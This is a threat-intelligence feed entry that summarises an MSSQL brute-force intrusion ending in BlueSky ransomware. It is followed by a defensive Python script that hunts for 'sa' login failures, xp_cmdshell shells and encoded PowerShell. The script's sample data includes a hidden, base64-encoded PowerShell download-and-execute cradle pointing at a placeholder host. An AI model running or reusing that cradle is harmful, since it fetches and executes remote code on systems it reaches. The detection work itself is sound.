SQL Brute Force Leads to BlueSky Ransomware
ID: de8ae56f-84e9-52f0-a47e-68a6d246d197
STIX ID: report--de8ae56f-84e9-52f0-a47e-68a6d246d197
Feed Name: The DFIR Report
#### Executive summary

In December 2022 attackers brute-forced the 'sa' account of an internet-exposed MSSQL server, enabled xp_cmdshell, and used it to run base64-encoded PowerShell that downloaded a Cobalt Strike beacon and a Tor2Mine miner payload. The intruders then performed process injection, credential dumping and lateral movement (remote service creation over SMB) and deployed BlueSky ransomware (vmware.exe), which encrypted network shares within ~32 minutes. The report provides C2 details, the full Cobalt Strike configuration, miner and ransomware hashes, IOCs (IPs, URIs), Sigma/YARA detections, and recommended hunting signatures.
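The summary above describes three initial-access and execution steps that leave distinct log evidence: repeated failed 'sa' logins in the MSSQL errorlog, a shell spawned by sqlservr.exe (the xp_cmdshell pattern), and a `-EncodedCommand` PowerShell argument. The following is an added hunting example, not code from The DFIR Report or from this feed; the errorlog lines follow the real "Login failed for user" format but are constructed, the process-event field names (`ParentImage`, `Image`, `CommandLine`) are an assumed Sysmon-like shape, and the IP addresses and download URL are documentation-range placeholders.

```python
"""Hunting helpers for the MSSQL brute-force -> xp_cmdshell -> encoded PowerShell chain.

All sample data below is constructed for the example; thresholds are assumptions
to tune against the environment's baseline.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# MSSQL errorlog format (real):
# "2022-12-05 03:12:07.41 Logon       Login failed for user 'sa'. Reason: ... [CLIENT: 203.0.113.10]"
LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[\d.]+)\]"
)

# Common spellings of the encoded-command switch; PowerShell accepts any unambiguous prefix.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

SQL_PARENT = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def detect_sa_brute_force(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: total_failures} for clients with >= threshold failed 'sa'
    logins inside any sliding window of the given length."""
    fails = defaultdict(list)
    for line in lines:
        m = LOGON_RE.match(line)
        if not m or m["user"].lower() != "sa":
            continue
        fails[m["ip"]].append(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"))
    hits = {}
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # shrink window from the left
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = len(times)
                break
    return hits


def decode_encoded_powershell(cmdline):
    """Return the plaintext script behind a -EncodedCommand argument (base64 of
    UTF-16LE), or None if the command line carries none or it does not decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_xp_cmdshell_children(events):
    """Flag process-creation events where sqlservr.exe spawns a shell, which is how
    xp_cmdshell executes. Returns [(child_image, decoded_script_or_None), ...]."""
    findings = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if parent == SQL_PARENT and image in SHELLS:
            findings.append((image, decode_encoded_powershell(ev["CommandLine"])))
    return findings


# --- constructed sample data -------------------------------------------------
SAMPLE_ERRORLOG = [
    f"2022-12-05 03:12:{s:02d}.41 Logon       Login failed for user 'sa'. "
    f"Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]"
    for s in range(0, 30, 5)  # six failures in 25 seconds from one client
] + [
    "2022-12-05 03:15:00.10 Logon       Login failed for user 'sa'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.5]"
]

# The encoded payload is generated here so the example stays self-contained.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'"cmd.exe" /c powershell -nop -w hidden -enc {SAMPLE_ENC}'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": '"cmd.exe" /c dir'},
]

if __name__ == "__main__":
    print("brute force:", detect_sa_brute_force(SAMPLE_ERRORLOG))
    for image, script in detect_xp_cmdshell_children(SAMPLE_EVENTS):
        print(f"sqlservr.exe -> {image}: {script!r}")
```

The sliding window in `detect_sa_brute_force` matters because a slow brute force spread over hours will not trip a per-minute count; lower the threshold or widen the window when the errorlog shows a steady trickle of failures from one client. Decoding the `-enc` argument rather than only flagging it lets the hunt surface the download URL, which is where the C2 and payload IOCs from the report would be matched.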
